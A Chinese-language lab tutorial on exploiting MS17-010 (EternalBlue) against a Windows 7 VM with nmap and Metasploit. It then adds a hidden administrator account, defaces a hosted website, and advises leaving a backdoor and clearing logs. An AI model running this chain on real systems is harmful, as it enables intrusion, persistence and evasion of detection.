进击!利用ms17-010漏洞入侵windows7
本教程仅用于交流学习,请遵守网络安全相关法律法规,如果利用本技术进行互联网犯罪,本人概不负责。
前几篇投稿我们基于web层面,讲解了SQL注入的一些方法。今天这篇教程,我们则通过漏洞,对靶机进行入侵。
实验环境:
攻击机:kali linux
靶机:windows7 professional
首先,我们得知了这个机器的ip地址(在靶机cmd输入ipconfig),那么,我们可以先进行一定的信息收集。
我们要知道靶机开启了什么端口,每个端口运行了什么服务,每个服务的版本号,靶机存在的漏洞等等信息。所以,我们可以先跑一遍nmap,收集端口,漏洞等信息。
我们输入nmap -v 靶机ip后,看到了如下结果,我们看到了靶机开放了很多的端口,或许会为我们的渗透测试提供一定的帮助。

至于我为什么没有进行OS Scan,我的靶机运行在虚拟机中,无法测出准确的系统os,仅能测试出靶机运行在虚拟机中。
nmap扫描其实是一个很强大的扫描工具,我们可以使用nmap对靶机进行常见漏洞的扫描。
我们输入:
nmap -v 靶机ip --script=vuln



我们探测出了这些漏洞,靶机可能存在sql注入,存在slowloris ddos attack漏洞,不过,有一个漏洞吸引了我,那就是我们今天的主角:ms17-010(永恒之蓝)
永恒之蓝漏洞在百度上的介绍很多,在这里就不进行缀述了,感兴趣可以去百度查询一下。
我们既然拿到了漏洞,我们就尝试利用漏洞对靶机进行攻击。
漏洞利用工具:msfconsole
我们在命令栏输入msfconsole

这就是msfconsole工具,这里集成了很多漏洞利用模块,我们查找一下永恒之蓝的漏洞利用模块。
输入search ms17-010

我们看到了如下模块,其中,exploit为攻击模块,auxiliary为探测模块,我们可以利用攻击模块进行攻击。
我们输入use exploit/windows/smb/ms17_010_eternalblue

这样我们就设置好了攻击模块,下一步我们可以设置一下payload攻击载荷。
我们输入show payloads

我们看到这个模块有很多的攻击载荷,我们可以多进行尝试,换不同的payload进行攻击
我们设置好攻击载荷,接下来我们可以看看这个模块要设置什么参数
输入命令show options

这样显示出了我们需要填写的参数,不过,在这里,实际需要填写的参数只有RHOST
这里,RHOST为靶机的ip地址。
我们输入命令
set RHOST 靶机ip

这样我们的攻击目标就设置好了,接下来我们就要发动攻击了。
输入命令exploit

到这里攻击成功了,不过我们的攻击还没有结束,我们来看一下靶机当前状态。

目前靶机是什么提示都没有的,也不知道已经遭受了攻击。
我们接下来查看一下我们当前的权限,查看是否需要提权。
输入命令
getuid

我们看到我们当前的权限为system权限,那么我们就无需进行提权了,我们尝试一下拿靶机的shell
输入命令
shell

嗯看起来已经成功拿到shell了,那么,我们接下来就要做点坏事了。我们通过最开始的信息收集阶段,看到靶机的3389端口是开放的,那么我们可以尝试远程登陆(当然没开也没关系,我们可以通过shell进行开启)
那么既然可以远程登录,我们就要用到账号密码进行登录,最简单的方法就是创建一个用户,然后把这个用户加入到管理员组。
那么这里就要用到一些windows基础cmd命令的知识了。
我们输入
net user hacker a1353008533aA /add

接下来检查一下是否添加成功
输入命令
net user

嗯看起来添加成功了,然后我们要把这个用户添加到管理员组。
输入命令
net localgroup Administrators hacker /add

我们尝试用远程桌面连接来连接靶机,用我们创建的用户。

嗯,看起来成功了。
接下来干点什么呢,挂个黑页吧,刚刚好之前编写了一个黑页。
我们既然攻击成功了,那么上传文件我们也能够做到,我们输入命令
upload 文件 上传地址

这里,我是把我的黑页上传到了本地磁盘C根目录下,我们看看是否上传成功。

很好,找到黑页了,我们这台靶机运行了一个phpstudy,并在上面正在运行一个网站,那么,我直接把原来的网站删掉,然后把我的黑页挂上去。然后我们访问一下网站看看。

很好,这样黑页就挂上去了,无论任何人访问这个网站都会显示我们的黑页。
最后,我们可以留一个后门,以便于我们任何时候都可以连接到这个靶机。这里就不详细演示了。
当然,你也可以做一些你想做的事,不过,离开前,记得清理一下日志,不要留下什么线索。
本篇教程到这里就结束了,接下来,我会出一些关于其他漏洞复现以及网络安全知识的相关教程。如果发现本篇教程出现什么错误,请指出来。